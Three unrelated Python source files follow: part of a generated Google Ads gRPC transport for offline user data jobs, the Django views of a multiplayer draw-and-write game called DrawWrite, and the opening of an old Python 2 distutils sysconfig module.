)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
def close(self):
self.grpc_channel.close()
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if "operations_client" not in self.__dict__:
self.__dict__["operations_client"] = operations_v1.OperationsClient(
self.grpc_channel
)
# Return the client from cache.
return self.__dict__["operations_client"]
@property
def create_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.CreateOfflineUserDataJobRequest],
offline_user_data_job_service.CreateOfflineUserDataJobResponse,
]:
r"""Return a callable for the create offline user data job method over gRPC.
Creates an offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__ `FieldError <>`__
`HeaderError <>`__ `InternalError <>`__
`NotAllowlistedError <>`__ `OfflineUserDataJobError <>`__
`QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.CreateOfflineUserDataJobRequest],
~.CreateOfflineUserDataJobResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_offline_user_data_job" not in self._stubs:
self._stubs[
"create_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/CreateOfflineUserDataJob",
request_serializer=offline_user_data_job_service.CreateOfflineUserDataJobRequest.serialize,
response_deserializer=offline_user_data_job_service.CreateOfflineUserDataJobResponse.deserialize,
)
return self._stubs["create_offline_user_data_job"]
@property
def get_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.GetOfflineUserDataJobRequest],
offline_user_data_job.OfflineUserDataJob,
]:
r"""Return a callable for the get offline user data job method over gRPC.
Returns the offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetOfflineUserDataJobRequest],
~.OfflineUserDataJob]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_offline_user_data_job" not in self._stubs:
self._stubs[
"get_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/GetOfflineUserDataJob",
request_serializer=offline_user_data_job_service.GetOfflineUserDataJobRequest.serialize,
response_deserializer=offline_user_data_job.OfflineUserDataJob.deserialize,
)
return self._stubs["get_offline_user_data_job"]
@property
def add_offline_user_data_job_operations(
self,
) -> Callable[
[offline_user_data_job_service.AddOfflineUserDataJobOperationsRequest],
offline_user_data_job_service.AddOfflineUserDataJobOperationsResponse,
]:
r"""Return a callable for the add offline user data job
operations method over gRPC.
Adds operations to the offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__ `FieldError <>`__
`HeaderError <>`__ `InternalError <>`__ `MutateError <>`__
`OfflineUserDataJobError <>`__ `QuotaError <>`__
`RequestError <>`__
Returns:
Callable[[~.AddOfflineUserDataJobOperationsRequest],
~.AddOfflineUserDataJobOperationsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "add_offline_user_data_job_operations" not in self._stubs:
self._stubs[
"add_offline_user_data_job_operations"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/AddOfflineUserDataJobOperations",
request_serializer=offline_user_data_job_service.AddOfflineUserDataJobOperationsRequest.serialize,
response_deserializer=offline_user_data_job_service.AddOfflineUserDataJobOperationsResponse.deserialize,
)
return self._stubs["add_offline_user_data_job_operations"]
@property
def run_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.RunOfflineUserDataJobRequest],
operations_pb2.Operation,
]:
r"""Return a callable for the run offline user data job method over gRPC.
Runs the offline user data job.
When finished, the long running operation will contain the
processing result or failure information, if any.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__
`HeaderError <>`__ `InternalError <>`__
`OfflineUserDataJobError <>`__ `QuotaError <>`__
`RequestError <>`__
Returns:
Callable[[~.RunOfflineUserDataJobRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "run_offline_user_data_job" not in self._stubs:
self._stubs[
"run_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/RunOfflineUserDataJob",
request_serializer=offline_user_data_job_service.RunOfflineUserDataJobRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["run_offline_user_data_job"]
# Public API of this module: only the transport class is exported.
__all__ = ("OfflineUserDataJobServiceGrpcTransport",)
|
|
"""All the views for DrawWrite."""
# Imports {{{
import logging
from base64 import b64decode
from itertools import zip_longest
from django.core.files.base import ContentFile
from django.db import IntegrityError
from django.http import HttpResponseBadRequest, HttpResponseNotAllowed, JsonResponse
from django.shortcuts import redirect, render
from drawwrite.forms import CreateGameForm, JoinGameForm
from drawwrite.models import Chain, Game, DrawLink, Player, WriteLink
from . import services
from .bracefmt import BraceFormatter as __
# }}}
LOG = logging.getLogger(__name__)
# index {{{
def index(request):
    """Render the front page with the create-game and join-game forms.

    Any one-shot error set by another view is popped out of the session
    so it is displayed exactly once.
    """
    LOG.debug("enter index")
    # TODO errors shouldn't get added by title and description, but by number.
    #      Then I should look up the title and description from that number.
    context = {
        'create_form': CreateGameForm(),
        'join_form': JoinGameForm(),
        'error_title': request.session.pop('error_title', None),
        'error_description': request.session.pop('error_description', None),
    }
    return render(request, 'drawwrite/index.html', context)
# }}}
# join_game {{{
def join_game(request):
    """
    Process data that a user sends when they want to join a game.

    Only POST is accepted. On any failure an error title/description pair
    is stored in the session and the user is redirected to the index;
    on success they are redirected to the play page for their new player.
    """
    LOG.debug('enter')
    # Send all non-POSTs to the index.
    if request.method != 'POST':
        LOG.info(__('attempted non-supported method {0}', request.method))
        request.session['error_title'] = 'Unsupported method'
        # BUG FIX: a stray trailing comma used to make this a 1-tuple, so the
        # template rendered a tuple instead of the message string.
        request.session['error_description'] = (
            'You\'re not allowed to send {0} requests to that endpoint.'.format(request.method)
        )
        return redirect('drawwrite:index')
    # Get the form from the POSTed data.
    form = JoinGameForm(request.POST)
    # Invalid forms redirect to the index with an error.
    if not form.is_valid():
        LOG.debug(__(
            'name {0} or gamename {1} invalid',
            form.data['username'],
            form.data['gamename'],
        ))
        request.session['error_title'] = 'Invalid input'
        request.session['error_description'] = ' '.join((
            'Your Name and the Game Name must only contain letters, numbers,',
            'underscores, and hyphens.',
        ))
        return redirect('drawwrite:index')
    # Valid forms are processed.
    gamename = form.cleaned_data['gamename']
    username = form.cleaned_data['username']
    # Get the game. On error, add error objects to the session and redirect
    # to index.
    # TODO extract this, possibly to services.py
    games = Game.objects.filter( #pylint: disable=no-member
        name=gamename,
    ).filter(
        started=False,
    )
    if len(games) > 1:
        LOG.error(__('somehow, two games with name {0} are being created', gamename))
        request.session['error_title'] = 'Non-unique game name'
        request.session['error_description'] = 'Could not find a unique game for you to join'
        return redirect('drawwrite:index')
    if len(games) < 1:
        LOG.error(__('tried to join non-existant game {0}', gamename))
        request.session['error_title'] = 'Non-existent game'
        request.session['error_description'] = ' '.join((
            'The game that you attempted to join, {0},'.format(gamename),
            'does not exist. Please check that you entered it correctly.',
        ))
        return redirect('drawwrite:index')
    game = games[0]
    LOG.debug(__('got game for player {0}', username))
    # Add a player to the game. On error, add error objects to the session and
    # redirect to index.
    player = None
    try:
        player = services.new_player(game, username, False)
    except services.GameAlreadyStarted:
        LOG.debug(__('could not add {0} to game {1}', username, game.name))
        request.session['error_title'] = 'Game started'
        request.session['error_description'] = ' '.join((
            'The game that you attempted to join has already started. Please',
            'either join a different game or start your own game.',
        ))
        return redirect('drawwrite:index')
    # TODO don't assume that all IntegrityError's mean that the game name is
    #      already taken. There are plenty of other explanations that I'm
    #      silencing by doing this.
    except IntegrityError:
        LOG.exception(__(
            'player with {0} already exists in game {1}',
            username,
            gamename,
        ))
        request.session['error_title'] = 'Player exists'
        request.session['error_description'] = ' '.join((
            'The player name that you entered is already in use in the game',
            'that you are trying to join. Please choose a new player name',
            'and try again.',
        ))
        return redirect('drawwrite:index')
    # Redirect to that game's page.
    LOG.debug('exiting join game view')
    return redirect('drawwrite:play', player.pk)
# }}}
# create_game {{{
def create_game(request):
    """
    Create a game according to the values the user specified in the form.

    Only POST is accepted. On success the creating player is redirected to
    the play page; on any failure an error title/description pair is stored
    in the session and the user is redirected to the index.
    """
    LOG.debug('entering create game view')
    # Send all non-POSTs to the index.
    if request.method != 'POST':
        LOG.debug(__('attempted non-supported method {0}', request.method))
        return redirect('drawwrite:index')
    # Get the form from the POSTed data.
    form = CreateGameForm(request.POST)
    # Invalid forms redirect to the index with an error.
    if not form.is_valid():
        LOG.debug(__(
            'form error: {0}',
            form.errors,
        ))
        request.session['error_title'] = 'Invalid input'
        request.session['error_description'] = ' '.join((
            'Your Name and the Game Name must only contain letters, numbers,',
            'underscores, and hyphens.',
        ))
        return redirect('drawwrite:index')
    # Valid forms are processed.
    gamename = form.cleaned_data['gamename']
    username = form.cleaned_data['username']
    # Create game. On error, add error objects to the session and redirect
    # to index.
    # TODO handle other errors that could happen?
    game = services.new_game(gamename)
    if game is None:
        request.session['error_title'] = 'Game being created'
        request.session['error_description'] = (
            'The game you are trying to join, {0}, is already being created'
        ).format(gamename)
        # BUG FIX: this branch used to fall through and call
        # services.new_player(None, ...); redirect to the index instead.
        return redirect('drawwrite:index')
    # Create a player for that game. On error, add error objects to the
    # session and redirect to index.
    player = None
    try:
        player = services.new_player(game, username, True)
    # TODO don't assume that all IntegrityError's mean that the user name is
    #      already taken. There are plenty of other explanations that I'm
    #      silencing by doing this.
    except services.NameTaken as exception:
        LOG.error('player name already taken')
        request.session['error_title'] = 'Player name taken'
        request.session['error_description'] = exception.message()
        return redirect('drawwrite:index')
    except IntegrityError:
        LOG.error(__('a new game has an invalid player {0}', username))
        request.session['error_title'] = 'Player name taken'
        request.session['error_description'] = ' '.join((
            'The player name that you entered, {0},'.format(username),
            ' is already taken for the game that you entered. Please',
            'try a different one.',
        ))
        return redirect('drawwrite:index')
    # Redirect to that game's page.
    LOG.debug('exiting create game view')
    return redirect('drawwrite:play', player.pk)
# }}}
# play {{{
def play(request, player_id):
    """
    The page on which players play the game.

    Depending on game state this renders one of: the pre-game waiting room,
    a redirect to the finished-game view, a between-round (or end-of-game)
    waiting page, or the form for adding the next link to a chain.
    """
    LOG.debug('enter play view')
    # Get their player from the database using the id in the path. On error,
    # set error session attributes and redirect to index.
    player = None
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('non-existant player attempt: {0}', player_id))
        request.session['error_title'] = 'Player Does Not Exist'
        request.session['error_description'] = ' '.join((
            'You attempted to access a non-existant player. Plase do not',
            'do that.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('successfully retreived player {0}', player_id))
    # Get the game from the player object.
    game = player.game
    LOG.debug(__('successfully retreived game for player {0}', player_id))
    # If the game hasn't started, show the player the waiting screen.
    if not game.started:
        LOG.debug(__('game for player {0} has not started', player_id))
        # Get a list of all players in this game.
        all_players = Player.objects.filter(game=game) #pylint: disable=no-member
        LOG.debug(__('got players in game with player {0}', player_id))
        # Find the creator of the game.
        # BUG FIX: this loop used to reuse the name 'player', clobbering the
        # requesting player so the 'created' flag below reflected whichever
        # player happened to come last in the queryset.
        creator = None
        for candidate in all_players:
            if candidate.was_creator:
                creator = candidate
        if creator is not None:
            LOG.debug(__('creator of game is {0}', creator.name))
        # Render the waiting screen with all of those players.
        LOG.debug(__('showing player {0} the waiting screen', player_id))
        return render(request, 'drawwrite/waiting.html', {
            'all_players' : all_players,
            'player_id' : player_id,
            'created' : player.was_creator,
            'creator' : creator,
        })
    LOG.debug(__('game for player {0} has started', player_id))
    # The game has started. Check if it's also finished.
    if game.round_num >= game.num_players:
        LOG.debug('game finished, redirect to view page')
        return redirect('drawwrite:showGame', game.pk)
    # The game has started, so decide whether to show the waiting page.
    if player.current_round == game.round_num + 1:
        # If the player's round equals the number of players in the game,
        # show the 'wait for game completion' game.
        if player.current_round == player.game.num_players:
            LOG.debug('show game finished waiting page')
            return render(request, 'drawwrite/gameWaiting.html', {
                'game_id' : game.pk,
            })
        # If the game isn't finished, show the waiting page for the next round.
        LOG.debug('show waiting page, this user is done with current round')
        return render(request, 'drawwrite/roundWaiting.html', {
            'player_id' : player_id,
        })
    # If the player's round doesn't equal the game's round, something is fishy.
    elif player.current_round != game.round_num:
        LOG.error(__(
            'player {0} has round {1}, while game {2} has round {3}',
            player_id,
            player.current_round,
            game.pk,
            game.round_num,
        ))
        # TODO come up with a better thing to show the user in this case
        return HttpResponseBadRequest()
    # Figure out which position's chain this player should have access to next.
    chain_pos_to_get = (player.position + game.round_num) % game.num_players
    LOG.debug(__('player {0} needs position {1}s chain', player_id, chain_pos_to_get))
    # Get the owner of the chain that player will edit.
    chain_owner = None
    try:
        chain_owner = Player.objects.filter( #pylint: disable=no-member
            game=game,
        ).get(
            position=chain_pos_to_get,
        )
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__(
            'player with game {0} and pos {1} does not exist',
            game.pk,
            chain_pos_to_get,
        ))
        request.session['error_title'] = 'Player Does Not Exist'
        request.session['error_description'] = ' '.join((
            'You tried to get a player that does not exist. Sorry for',
            'the inconvenience.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('got chain_owner ({0}) for player {1}', chain_owner.pk, player_id))
    # Get the chain for the player.
    chain = None
    try:
        chain = Chain.objects.get(player=chain_owner) #pylint: disable=no-member
    except Chain.DoesNotExist: #pylint: disable=no-member
        # Make a chain for this player.
        # NOTE(review): the chain is created for the *requesting* player; on
        # round 0 chain_owner == player so this is correct — confirm a missing
        # chain cannot occur on later rounds.
        chain = services.new_chain(player)
    LOG.debug(__('got chain for user {0}', player_id))
    # If the chain has no links, show the player a screen to enter their first
    # text link.
    if chain.next_link_position == 0:
        LOG.debug(__('returning page for first link for user {0}', player_id))
        return render(request, 'drawwrite/chainAdd.html', {
            'prev_link_type': '',
            'prev_link': None,
            'player_id': player_id,
        })
    # Figure out what type of link the player needs to make: links alternate,
    # starting with writing at even positions and drawing at odd ones.
    prev_link_pos = chain.next_link_position - 1
    prev_link = None
    prev_link_type = ''
    if prev_link_pos % 2 == 0:
        prev_link_type = 'write'
        prev_link = WriteLink.objects.get( #pylint: disable=no-member
            chain=chain,
            link_position=prev_link_pos
        )
    else:
        prev_link_type = 'draw'
        prev_link = DrawLink.objects.get( #pylint: disable=no-member
            chain=chain,
            link_position=prev_link_pos
        )
    # Show the player a page to add the next link type.
    LOG.debug('exit add to chain view')
    return render(request, 'drawwrite/chainAdd.html', {
        'prev_link_type': prev_link_type,
        'prev_link': prev_link,
        'player_id': player_id,
    })
# }}}
# check_game_start {{{
def check_game_start(request, player_id): #pylint: disable=unused-argument
    """Check if the passed player's game has started.

    Returns JSON with a boolean 'started' flag and, while the game is
    still forming, the current list of player names.
    """
    LOG.debug(__('checking game status for player {0}', player_id))
    # Get the player.
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('non-existant player: {0}', player_id))
        return HttpResponseBadRequest()
    LOG.debug(__('successfully found player {0}', player_id))
    # If the player's game has not started, return an updated list of names.
    if not player.game.started:
        LOG.debug(__('player {0} game has not started', player_id))
        # Get all the players in the game.
        all_players = Player.objects.filter(game=player.game) #pylint: disable=no-member
        LOG.debug(__('got all players in game with {0}', player_id))
        # BUG FIX: the old accumulation loop rebound the name 'player',
        # shadowing the player fetched above; use a comprehension instead.
        names = [member.name for member in all_players]
        LOG.debug('made list of all player names')
        # Return the data we need.
        return JsonResponse({'started': False, 'names': names})
    # If the player's game has started, return an object indicating as much.
    return JsonResponse({'started': True, 'names': []})
# }}}
# start_game {{{
def start_game(request, player_id):
    """Start the game of the player identified by player_id"""
    LOG.debug(__('starting game of player {0}', player_id))
    # Only POST may start a game.
    if request.method != 'POST':
        LOG.error('attempted to GET to start game')
        return HttpResponseBadRequest()
    # Look up the player whose game should be started.
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('non-existant player {0}', player_id))
        return HttpResponseBadRequest()
    LOG.debug(__('successfully got player {0}', player_id))
    # Flip the player's game to 'started', then send them to the play view.
    services.start_game(player.game)
    LOG.debug('set players game to started')
    LOG.debug('redirecting to play')
    return redirect('drawwrite:play', player_id)
# }}}
# create_link {{{
def create_link(request, player_id):
    """
    Accept POST data and create a new link in the chain that player_id should
    be adding to.

    Even link positions take a text 'description'; odd positions take a
    base64-encoded PNG in 'drawing'. After the link is stored the player is
    redirected back to the play view.
    """
    LOG.debug(__('creating link for player {0}', player_id))
    # Only accept POSTs
    if request.method != 'POST':
        LOG.error('should have POSTed data')
        return HttpResponseNotAllowed(['POST'])
    LOG.debug(__('got POST data for player {0}', player_id))
    # Get the player.
    player = None
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('non-existant player {0}', player_id))
        request.session['error_title'] = 'Player Does Not Exist'
        request.session['error_description'] = ' '.join((
            'The player that you tried to create a link for does not exist.',
            'We apologize for the inconvenience.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('got the player with pk {0}', player_id))
    # Calculate the position of the player that this player_id is adding to.
    chain_owner_pos = (player.position + player.game.round_num) % player.game.num_players
    LOG.debug(__('player {0} needs chain of player {1}', player_id, chain_owner_pos))
    # Get the owner of the chain this player is adding to.
    try:
        chain_owner = Player.objects.filter( #pylint: disable=no-member
            game=player.game,
        ).get(
            position=chain_owner_pos,
        )
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__(
            'player with game {0} and position {1} does not exist',
            player.game.pk,
            chain_owner_pos,
        ))
        request.session['error_title'] = 'Player Does Not Exist'
        # BUG FIX: this used to write session key 'description'; every other
        # view and the index template use 'error_description', so the message
        # was never shown.
        request.session['error_description'] = ' '.join((
            'You attempted to access a player that does not exist. We are',
            'sorry for the inconvenience.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('successfully got chain owner for player {0}', player_id))
    # Get the player's chain.
    chain = None
    try:
        chain = Chain.objects.get(player=chain_owner) #pylint: disable=no-member
    except Chain.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('player {0} should have a chain but does not', player_id))
        request.session['error_title'] = 'Player Has No Chain'
        request.session['error_description'] = ' '.join((
            'The player that you tried to create a link for does not have',
            'a chain, but that should not be possible. We apologize for',
            'the inconvenience.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('got the chain for player with pk {0}', player_id))
    # Figure out what type of link to make: even positions are writing,
    # odd positions are drawing.
    if chain.next_link_position % 2 == 0:
        # The POST data needs to have the 'description' field or something
        # is wrong.
        if 'description' not in request.POST:
            LOG.error(' '.join((
                'should be making write link, but did not receive any',
                'writing in the POSTed data',
            )))
            return HttpResponseBadRequest()
        LOG.debug(__('making new write link for player {0}', player_id))
        # Make the new write link.
        services.new_write_link(chain, request.POST.get('description'), player)
    else:
        # The POST data needs to have the 'drawing' field or something
        # is wrong.
        if 'drawing' not in request.POST:
            LOG.error(' '.join((
                'should be making a draw link, but did not receive any',
                'drawing data in the POSTed data',
            )))
            return HttpResponseBadRequest()
        LOG.debug('got image data to save')
        # Make sure the data starts with 'data:image/png;base64,'
        data_string = request.POST.get('drawing')
        if not data_string.startswith('data:image/png;base64,'):
            LOG.error(__('got bad image data: started with {0}', data_string[0:15]))
            return HttpResponseBadRequest()
        LOG.debug('got good(ish) image data')
        # Shave off the data-URL prefix, leaving only the base64 payload.
        data_string = data_string.split(';base64,')[1]
        LOG.debug('split off the ;base64, stuff')
        # Decode the base64 data.
        binary_data = b64decode(data_string)
        LOG.debug('decoded base64 data')
        # Make a file-like object out of the data.
        file_name = "link-{0}-{1}.png".format(player_id, chain.next_link_position)
        file_obj = ContentFile(binary_data, name=file_name)
        LOG.debug(__('made file with name {0}', file_name))
        # Make the draw link.
        services.new_draw_link(chain, file_obj, player)
        LOG.debug(__('created draw link, file has name {0}', file_name))
    # Increase the 'num_players_finished_current_round' of this game.
    services.player_finished(player)
    # Redirect to 'play'.
    return redirect('drawwrite:play', player_id)
# }}}
# check_round_done {{{
def check_round_done(request, player_id):
    """
    Check if the round of the current game is completed. Return a javascript
    object that has a list of every player's name that has not completed the round.
    """
    LOG.debug(__('checking if round is completed for player {0}', player_id))
    # Get the player.
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error('attempted to get player that does not exist')
        request.session['error_title'] = 'Player Does Not Exist'
        request.session['error_description'] = ' '.join((
            'The player that you attempted to get does not exist. We are',
            'sorry for the inconvenience.',
        ))
        return redirect('drawwrite:index')
    LOG.debug(__('successfully got player {0}', player_id))
    # The player may move on once the game's round has caught up with theirs.
    if player.game.round_num == player.current_round:
        LOG.debug('round is completed')
        # Return an object saying that the round is done.
        return JsonResponse({'finished': True})
    LOG.debug('round is not completed')
    # Collect the names of every player who has not finished this round.
    # BUG FIX: querysets are lazy, so the old code evaluated the query
    # *outside* this try block and the logging could never fire; iterate
    # inside the try instead. The old loop also rebound the name 'player'.
    try:
        players_still_playing = Player.objects.filter( #pylint: disable=no-member
            game=player.game,
        ).filter(
            current_round__lt=player.current_round,
        )
        names_still_playing = [laggard.name for laggard in players_still_playing]
    except BaseException as exception:
        LOG.error(exception)
        raise
    LOG.debug('got list of players still playing')
    LOG.debug('got list of names of players still playing')
    # Return an object saying that the round is not done.
    return JsonResponse({
        'finished': False,
        'still_playing': names_still_playing,
    })
# }}}
# check_game_done {{{
def check_game_done(request, game_id): #pylint: disable=unused-argument
    """Check if the game with the passed game_id is finished.

    Returns JSON with a boolean 'finished' flag and, while unfinished,
    the names of the players still working on the current round.
    """
    LOG.debug(__('checking if game {0} is done', game_id))
    # Get the game.
    try:
        game = Game.objects.get(pk=game_id) #pylint: disable=no-member
    except Game.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('tried to get non-existant game {0}', game_id))
        # TODO better error stuff
        # BUG FIX: this used to return the HttpResponseBadRequest *class*
        # (missing parentheses) instead of a response instance.
        return HttpResponseBadRequest()
    LOG.debug(__('got game {0}', game_id))
    # The game is done once the round counter reaches the player count.
    if game.round_num == game.num_players:
        return JsonResponse({'finished': True})
    # Collect the names of players whose current round equals the game's round.
    # Querysets are lazy, so iterate inside the try so errors are logged.
    try:
        players_still_playing = Player.objects.filter( #pylint: disable=no-member
            game=game,
        ).filter(
            current_round=game.round_num,
        )
        names_still_playing = [laggard.name for laggard in players_still_playing]
    except BaseException as exception:
        LOG.error(exception)
        raise
    LOG.debug('got list of players still playing')
    LOG.debug('created list of names of players still playing')
    # Return an object saying that the round is not done.
    return JsonResponse({
        'finished': False,
        'still_playing': names_still_playing,
    })
# }}}
# show_game {{{
def show_game(request, game_id):
    """Show a completed game."""
    LOG.debug(__('showing game {0}', game_id))
    # Look up the game; an unknown id gets a 400.
    try:
        game = Game.objects.get(pk=game_id) #pylint: disable=no-member
    except Game.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('tried to get non-existant game {0}', game_id))
        # TODO better error here
        return HttpResponseBadRequest()
    LOG.debug(__('got game {0}', game_id))
    # Render the game view with every player that took part in this game.
    participants = Player.objects.filter(game=game) #pylint: disable=no-member
    return render(request, 'drawwrite/game.html', {
        'players': participants,
        'game_name': game.name,
    })
# }}}
# show_chain {{{
def show_chain(request, player_id):
    """Render one player's completed chain of writings and drawings."""
    LOG.debug(__('showing chain of player {0}', player_id))
    # Resolve the player; reject unknown ids with a 400.
    try:
        player = Player.objects.get(pk=player_id) #pylint: disable=no-member
    except Player.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('tried to get non-existant player {0}', player_id))
        # TODO better error messege
        return HttpResponseBadRequest()
    LOG.debug(__('got player {0}', player_id))
    # Resolve that player's chain.
    try:
        chain = Chain.objects.get(player=player) #pylint: disable=no-member
    except Chain.DoesNotExist: #pylint: disable=no-member
        LOG.error(__('tried to get non-existant chain for player {0}', player_id))
        # TODO better error message
        return HttpResponseBadRequest()
    LOG.debug(__('got chain for player {0}', player_id))
    write_links = WriteLink.objects.filter(chain=chain) #pylint: disable=no-member
    draw_links = DrawLink.objects.filter(chain=chain) #pylint: disable=no-member
    # Interleave write/draw links in play order; zip_longest keeps the
    # trailing element when the two querysets differ in length.
    links = []
    for write, draw in zip_longest(write_links, draw_links):
        links.extend(link for link in (write, draw) if link is not None)
    LOG.debug(__('made list of all links for player {0}', player_id))
    return render(request, 'drawwrite/chain.html', {
        'links': links,
        'player': player,
    })
# }}}
# get_available_games {{{
def get_available_games(request):
    """Return a JSON list of names of games that may still be joined.

    A game is joinable while it has not yet been started.
    """
    being_created = Game.objects.filter(started=False) #pylint: disable=no-member
    # Idiomatic comprehension instead of a manual append loop.
    options = [game.name for game in being_created]
    LOG.debug('returning list of available games')
    return JsonResponse({'options': options})
# }}}
|
|
"""Provide access to Python's configuration information. The specific names
defined in the module depend heavily on the platform and configuration.
Written by: Fred L. Drake, Jr.
Email: <fdrake@acm.org>
Initial date: 17-Dec-1998
"""
__revision__ = "$Id: sysconfig.py,v 1.34 2001/02/28 19:40:27 akuchling Exp $"
import os
import re
import string
import sys
from errors import DistutilsPlatformError
# These are needed in a couple of spots, so just compute them once.
PREFIX = os.path.normpath(sys.prefix)
EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
# Boolean; if it's true, we're still building Python, so
# we use different (hard-wired) directories.
python_build = 0
def set_python_build():
    """Set the python_build flag to true; this means that we're
    building Python itself.  Only called from the setup.py script
    shipped with Python.
    """
    # Flips the module-level flag consulted by get_python_inc(),
    # get_config_h_filename(), get_makefile_filename() and _init_posix().
    global python_build
    python_build = 1
def get_python_inc(plat_specific=0, prefix=None):
    """Return the directory containing installed Python header files.
    If 'plat_specific' is false (the default), this is the path to the
    non-platform-specific header files, i.e. Python.h and so on;
    otherwise, this is the path to platform-specific header files
    (namely config.h).
    If 'prefix' is supplied, use it instead of sys.prefix or
    sys.exec_prefix -- i.e., ignore 'plat_specific'.
    """
    if prefix is None:
        # Pre-2.5 'and/or' idiom standing in for a conditional expression.
        prefix = (plat_specific and EXEC_PREFIX or PREFIX)
    if os.name == "posix":
        if python_build:
            # Building Python itself: headers are still in the source tree.
            return "Include/"
        return os.path.join(prefix, "include", "python" + sys.version[:3])
    elif os.name == "nt":
        return os.path.join(prefix, "Include") # include or Include?
    elif os.name == "mac":
        return os.path.join(prefix, "Include")
    else:
        # Python 2 raise syntax: this is a legacy distutils module.
        raise DistutilsPlatformError, \
            ("I don't know where Python installs its C header files " +
            "on platform '%s'") % os.name
def get_python_lib(plat_specific=0, standard_lib=0, prefix=None):
    """Return the directory containing the Python library (standard or
    site additions).
    If 'plat_specific' is true, return the directory containing
    platform-specific modules, i.e. any module from a non-pure-Python
    module distribution; otherwise, return the platform-shared library
    directory.  If 'standard_lib' is true, return the directory
    containing standard Python library modules; otherwise, return the
    directory for site-specific modules.
    If 'prefix' is supplied, use it instead of sys.prefix or
    sys.exec_prefix -- i.e., ignore 'plat_specific'.
    """
    if prefix is None:
        # Pre-2.5 'and/or' idiom standing in for a conditional expression.
        prefix = (plat_specific and EXEC_PREFIX or PREFIX)
    if os.name == "posix":
        libpython = os.path.join(prefix,
                                 "lib", "python" + sys.version[:3])
        if standard_lib:
            return libpython
        else:
            return os.path.join(libpython, "site-packages")
    elif os.name == "nt":
        if standard_lib:
            return os.path.join(PREFIX, "Lib")
        else:
            # Site-specific modules live directly under the prefix on NT
            # in this legacy layout.
            return prefix
    elif os.name == "mac":
        if plat_specific:
            if standard_lib:
                return os.path.join(EXEC_PREFIX, "Mac", "Plugins")
            else:
                # Python 2 raise syntax (legacy module).
                raise DistutilsPlatformError, \
                    "OK, where DO site-specific extensions go on the Mac?"
        else:
            if standard_lib:
                return os.path.join(PREFIX, "Lib")
            else:
                raise DistutilsPlatformError, \
                    "OK, where DO site-specific modules go on the Mac?"
    else:
        raise DistutilsPlatformError, \
            ("I don't know where Python installs its library " +
            "on platform '%s'") % os.name
# get_python_lib()
def customize_compiler(compiler):
    """Do any platform-specific customization of the CCompiler instance
    'compiler'.  Mainly needed on Unix, so we can plug in the information
